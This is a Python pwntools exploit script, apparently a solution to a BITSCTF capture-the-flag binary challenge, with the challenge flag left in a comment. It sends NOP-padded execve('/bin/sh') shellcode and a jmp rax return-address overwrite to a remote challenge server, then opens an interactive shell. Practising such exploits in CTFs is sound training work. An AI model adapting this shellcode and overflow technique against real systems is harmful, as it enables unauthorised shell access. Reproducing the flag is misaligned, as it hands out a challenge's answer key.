from pwn import *

context.arch = 'amd64'

script = '''
b *vuln + 24
'''

shellcode = b"\x48\xB8\x2F\x62\x69\x6E\x2F\x73\x68\x00\x50\x48\x89\xE7\x48\x31\xF6\x48\x31\xD2\x48\xC7\xC0\x3B\x00\x00\x00\x0F\x05"

p = remote("chals.bitskrieg.in", 6001)
#p = process("./main")
#p = gdb.debug("./main", gdbscript = script)

jmp_rax = 0x00000000004010ac

payload = shellcode
payload = payload.rjust(0x70, b"\x90")
payload += b"B" * 0x8 + p64(jmp_rax)
p.sendline(payload)

p.interactive()
#BITSCTF{w3lc0m3_70_7h3_w0rld_0f_b1n4ry_3xpl01t4t10n_ec5d9205}